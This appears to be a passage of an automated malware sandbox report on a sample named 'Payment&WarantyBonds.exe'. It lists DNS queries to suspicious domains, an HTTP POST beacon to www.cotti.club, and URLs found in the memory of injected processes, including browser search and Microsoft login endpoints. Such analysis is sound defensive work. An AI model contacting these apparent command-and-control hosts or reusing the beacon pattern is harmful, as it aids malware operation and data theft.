                Source: global trafficDNS traffic detected: DNS query: www.030002059.xyz
                Source: global trafficDNS traffic detected: DNS query: www.xipowerplay.xyz
                Source: global trafficDNS traffic detected: DNS query: www.stationseek.online
                Source: global trafficDNS traffic detected: DNS query: www.091210.xyz
                Source: global trafficDNS traffic detected: DNS query: www.adsa6c.top
                Source: global trafficDNS traffic detected: DNS query: www.simplek.top
                Source: global trafficDNS traffic detected: DNS query: www.297676.com
                Source: global trafficDNS traffic detected: DNS query: www.cesach.net
                Source: global trafficDNS traffic detected: DNS query: www.basicreviews.online
                Source: global trafficDNS traffic detected: DNS query: www.sgland06.online
                Source: global trafficDNS traffic detected: DNS query: www.extrime1.shop
                Source: unknownHTTP traffic detected: POST /3ej6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Host: www.cotti.clubCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 199Connection: closeOrigin: http://www.cotti.clubReferer: http://www.cotti.club/3ej6/User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:38:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:38:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:38:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:38:42 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 00:39:15 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FqvMzc9b4Xm8EXRXwIzEUx8qTuQreof9LnpSj757TG6WG80x4Ho%2BYvbZ3OXo6m%2FtEQVc995R9BOgcYzdANGLOEp83aiuuX2fghWWCXrEggENxLM0%2BYkSujP8%2BDxBpKWVkg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8daf9643dcff68f9-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=704&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 00:39:18 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BYjP6e0t%2BMYPZTn0qR%2FdKNOPYh%2FGD%2FxnmuQtwXu1eM3XG18S8P9aDiP7oySl%2F0GnVYlRgn10JoshBpGChVIfvvhW4eAm6boYhHx5rM2PrSTfuIaN%2B4E4r4pWB1oQlQ1%2F6Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8daf9653c814e73a-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1145&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=724&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 00:39:20 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CzRp0ITpMiKMmyqvDYE1xNjy3Lah1je4q%2FIS0Upv7LW9qevGZg4yWiG%2FofLNMKnn0SZXK1%2FPhoNLe2rA5qckraWgi%2FGznFJ0LVXn2zWKijQRPFVynSKAqSTox39thQdHPg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8daf9663ad812e72-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2173&sent=3&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10806&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 00:39:23 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ex3NA40qn75CUdLhGIHIJeT%2Fh5Q3gt3uDkQuj0zOs5DrOvfGrCm4hdvuJ4%2BMltLEVJl2gxny37spWt2QFejTdvRzb6yKU6HazCWEoDjrrf84tlKSZRUKcHOttHICwQPlQg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8daf9673ba1ca916-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1927&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=449&delivery_rate=0&cwnd=139&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Ascii: 104<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.091210.xyz Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:39:31 GMTContent-Type: text/htmlContent-Length: 146Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:39:34 GMTContent-Type: text/htmlContent-Length: 146Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:39:36 GMTContent-Type: text/htmlContent-Length: 146Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:39:39 GMTContent-Type: text/htmlContent-Length: 146Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 00:39:45 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 00:39:48 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 00:39:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 00:39:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Thu, 31 Oct 2024 00:40:12 GMT
                    Server: Apache
                    X-ServerIndex: llim605
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Transfer-Encoding: chunked
                    Content-Type: text/html; charset=UTF-8
                Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Thu, 31 Oct 2024 00:40:15 GMT
                    Server: Apache
                    X-ServerIndex: llim604
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Transfer-Encoding: chunked
                    Content-Type: text/html; charset=UTF-8
                Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Thu, 31 Oct 2024 00:40:17 GMT
                    Server: Apache
                    X-ServerIndex: llim603
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Transfer-Encoding: chunked
                    Content-Type: text/html; charset=UTF-8
                Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Thu, 31 Oct 2024 00:40:20 GMT
                    Server: Apache
                    X-ServerIndex: llim605
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Transfer-Encoding: chunked
                    Content-Type: text/html; charset=UTF-8
                Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 31 Oct 2024 00:40:40 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    vary: accept-encoding
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HaBDA6u5OAiLgOO3iitkTWt7Gzk3nlOpUZdWmStgVbKi76Dk70lYeB8WTo4t%2FTwQoV5A9CUBjDtEMHJ3XbrGWzR47KgsUF5nr7uiegTWjJdJIm%2BfR4PfpnWzcPuiLofp4LcwS35M%2FkrxAA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Content-Encoding: gzip
                    server-timing: cfL4;desc="?proto=TCP&rtt=1754&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=739&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 31 Oct 2024 00:40:42 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    vary: accept-encoding
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n44l2GrAdPQ0zSKfCFTruPRhdLcZAiL19XAF4s6HM7j7Z%2Boipc77%2B7F3rlGczdjpJW3B2eO8Vv4FUGBbscOKfTOLkrLMZz42oCtvP8btoq34B6A%2B2rycEueLohmVCJG3OUKKpI49YwfMqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Content-Encoding: gzip
                    server-timing: cfL4;desc="?proto=TCP&rtt=1767&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=759&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 31 Oct 2024 00:40:45 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    vary: accept-encoding
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2WDU6WvB3C9tJ0sIY%2F0d3rdEIqTy%2FKs0g9Lt4eeJVeDrQ5Ha11t9Jz9AARlBhiOIPwccihoKurDxtnYN4%2BE3Ml4IFyEPmz1WgXJ1JCouZnvs4Lu8cEfCM0HzSzhVYij8E0%2FFYX2yqjDOGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Content-Encoding: gzip
                    server-timing: cfL4;desc="?proto=TCP&rtt=1970&sent=2&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10841&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 31 Oct 2024 00:40:47 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    vary: accept-encoding
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6rb1Hsqw0fAtJt7j%2FD5yS3KpWDyWwmpQnXJ7Fcdjx2RIKZrujqcP6ywLD5tAyhsEc9dB6nSI%2Fzn%2BC3fX0svUGjgIe%2Fi49S%2BfcB8TP%2BvniLhVq7aeTxKH3Uppy0vLyGm0qZVupMsFRtz1JA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    server-timing: cfL4;desc="?proto=TCP&rtt=1808&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=474&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                    Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 31 Oct 2024 00:40:54 GMT
                    Content-Type: text/html
                    Content-Length: 146
                    Connection: close
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 31 Oct 2024 00:40:56 GMT
                    Content-Type: text/html
                    Content-Length: 146
                    Connection: close
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 31 Oct 2024 00:40:59 GMT
                    Content-Type: text/html
                    Content-Length: 146
                    Connection: close
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 31 Oct 2024 00:41:01 GMT
                    Content-Type: text/html
                    Content-Length: 146
                    Connection: close
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: systeminfo.exe, 00000007.00000002.4107343980.00000000062BA000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000003B6A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi?78=hLX784qEA4n55Q1oGw1olOPE1jv2cb5vRwpnfGUp
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
                Source: lVlYtqLlYCJP.exe, 00000008.00000002.4108148789.0000000004AD4000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.extrime1.shop
                Source: lVlYtqLlYCJP.exe, 00000008.00000002.4108148789.0000000004AD4000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.extrime1.shop/jr4j/
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
                Source: systeminfo.exe, 00000007.00000002.4107343980.000000000594E000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000031FE000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.stationseek.online/wd23?78=hRp9
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
                Source: systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Exo
                Source: systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72
                Source: systeminfo.exe, 00000007.00000002.4105934203.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: systeminfo.exe, 00000007.00000002.4105934203.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: systeminfo.exe, 00000007.00000002.4105934203.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: systeminfo.exe, 00000007.00000002.4105934203.0000000000A09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033t
                Source: systeminfo.exe, 00000007.00000002.4105934203.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: systeminfo.exe, 00000007.00000002.4105934203.0000000000A09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: systeminfo.exe, 00000007.00000003.2209426415.0000000007825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/css/parking2.css
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-desplegar.jpg
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-facebook-small.png
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-hosting.png
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-parking.png
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-ssl-parking.png
